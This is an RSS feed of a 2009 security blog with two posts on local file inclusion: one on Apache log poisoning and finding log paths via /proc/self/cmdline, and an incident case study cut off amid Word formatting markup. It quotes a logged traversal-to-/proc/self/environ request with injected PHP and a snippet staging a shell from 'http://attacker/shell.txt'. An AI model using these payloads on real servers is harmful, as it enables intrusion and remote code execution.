<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Searix Security Blog</title>
	
	<link>http://security.searix.net</link>
	<description>Security Is Real</description>
	<pubDate>Mon, 23 Mar 2009 15:22:54 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.7.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SearixSecurityBlog" /><feedburner:info uri="searixsecurityblog" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>SearixSecurityBlog</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item>
		<title>Further Notes On LFI</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/EbrzblVcDA8/</link>
		<comments>http://security.searix.net/?p=109#comments</comments>
		<pubDate>Mon, 23 Mar 2009 15:18:38 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Research]]></category>

		<category><![CDATA[LFI]]></category>

		<category><![CDATA[log poisoning]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[security]]></category>

		<category><![CDATA[vulnerabilities]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=109</guid>
		<description><![CDATA[<br/>Having encountered the last LFI attack on my client, I researched a little more on ways that LFI can be used to exploit different scenarios. There is one other main adaptation of the concept which has been published by various sources, including milw0rm - log poisoning. Can't find the logs? There's a way around that too!]]></description>
			<content:encoded><![CDATA[<br/><p>Having encountered the last <a title="LFI Attack Case Study" href="http://security.searix.net/2009/03/09/case-study-%e2%80%93-directory-traversal-remote-code-execution-using-procselfenviron/" target="_blank">LFI attack</a> on my client, I researched a little more on ways that LFI can be used to exploit different scenarios. There is one other main adaptation of the concept which has been published by various sources, including <a title="Milw0rm Paper - LFI to RCE Exploit" href="http://www.milw0rm.com/papers/260" target="_blank">milw0rm</a> - log poisoning.</p>
<p>It would seem that Apache access logs as well as error logs can be injected with code such that when the log file is accessed, the code is parsed. Which means to say, the previous exploit that was used -</p>
<blockquote>
<pre class="MsoNormal">92.241.137.238 - - [07/Mar/2009:23:36:02 +0000]
"GET /?p=../../../../../../../../../..<span style="color: #ff0000;">/proc/self/environ</span><span style="color: #0000ff;"><strong>%00</strong></span> HTTP/1.1"
200 15491 "-"
"<span style="color: #800080;">&lt;? $o=fopen(\"testa.php\",\"a+\");
fwrite($o,\"stefo je king\"); fclose($o); ?&gt;</span>"</pre>
</blockquote>
<p>was exploitable in two different ways. The first way was described in the previous post. The second way would be that instead of writing &#8220;stefo je king&#8221;, if an actual PHP script like</p>
<blockquote>
<pre><span style="color: #3366ff;">$</span><span style="color: #00ccff;">o</span> = <span style="color: #ff0000;">fopen</span>(<span style="color: #ff00ff;">"shell.php"</span>,<span style="color: #ff00ff;">"w"</span>);<span style="color: #ff0000;">
fwrite</span>(<span style="color: #3366ff;">$</span><span style="color: #00ccff;">o</span>,<span style="color: #ff00ff;">"http://attacker/shell.txt"</span>);<span style="color: #ff0000;">fclose</span>(<span style="color: #3366ff;">$</span><span style="color: #00ccff;">o</span>);</pre>
</blockquote>
<p>was used, the the attacker could have tried to used the traversal attack to access a log file and get the shell script on the server again.</p>
<p>Another interesting piece of information I found was - let&#8217;s say Apache was installed in a non-default location and logs were therefore placed in a folder that was unknown to you. You have tried the default list of folders to search for and are out of ideas. Of course, the site is vulnerable to LFI. You could inject a piece of code to read from -</p>
<blockquote>
<pre>/proc/self/cmdline</pre>
</blockquote>
<p>Like /proc/self/environ shows the current environment status, /proc/self/cmdline shows the command line argument that spawned the process calling it. For example, if you&#8217;re calling it from shell, you&#8217;ll get &#8220;-bash&#8221; as the response. If Apache calls it, you&#8217;ll get the full path where Apache is installed. And you will then know where to find the logs.</p>
<p>As rhican rightly asserts, &#8220;good hosters should block access to /proc imho there&#8217;s tons of stuff a php script as no business there&#8221;.</p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=109</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=109</feedburner:origLink></item>
		<item>
		<title>Case Study – Directory Traversal &amp; Remote Code Execution Using /proc/self/environ</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/2xUXT_DnUW0/</link>
		<comments>http://security.searix.net/?p=92#comments</comments>
		<pubDate>Mon, 09 Mar 2009 09:44:35 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Research]]></category>

		<category><![CDATA[LFI]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[security]]></category>

		<category><![CDATA[vulnerabilities]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=92</guid>
		<description><![CDATA[<br/> 
Credits to Christian Busch for helping me out on this one.  
Late last night, I was approached with an interesting case of a denial of service attack. And I mean it – no one was able to access the service – because all files were deleted. The client informed me that remote shell [...]]]></description>
			<content:encoded><![CDATA[<br/><p><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>ZH-CN</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> <w:UseFELayout /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val=" " /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:SimSun; 	panose-1:2 1 6 0 3 1 1 1 1 1; 	mso-font-alt:宋体; 	mso-font-charset:134; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 135135232 16 0 262145 0;} @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;} @font-face 	{font-family:"\@SimSun"; 	panose-1:2 1 6 0 3 1 1 1 1 1; 	mso-font-charset:134; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 135135232 16 0 262145 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:SimSun; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:SimSun; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --> <!--[endif]--></p>
<p class="MsoNormal">Credits to Christian Busch for helping me out on this one. <img src='http://security.searix.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p class="MsoNormal">Late last night, I was approached with an interesting case of a <em>denial of service</em> attack. And I mean it – no one was able to access the service – because all files were deleted. The client informed me that remote shell scripts were able to find their way onto the server.</p>
<p class="MsoNormal">The first step was obviously to restore the files on the server, which was trivial given that WHM made daily backups for him. Then the search for the shell scripts began. I identified a couple of them –</p>
<p class="MsoNormal"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>ZH-CN</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> <w:UseFELayout /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val=" " /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    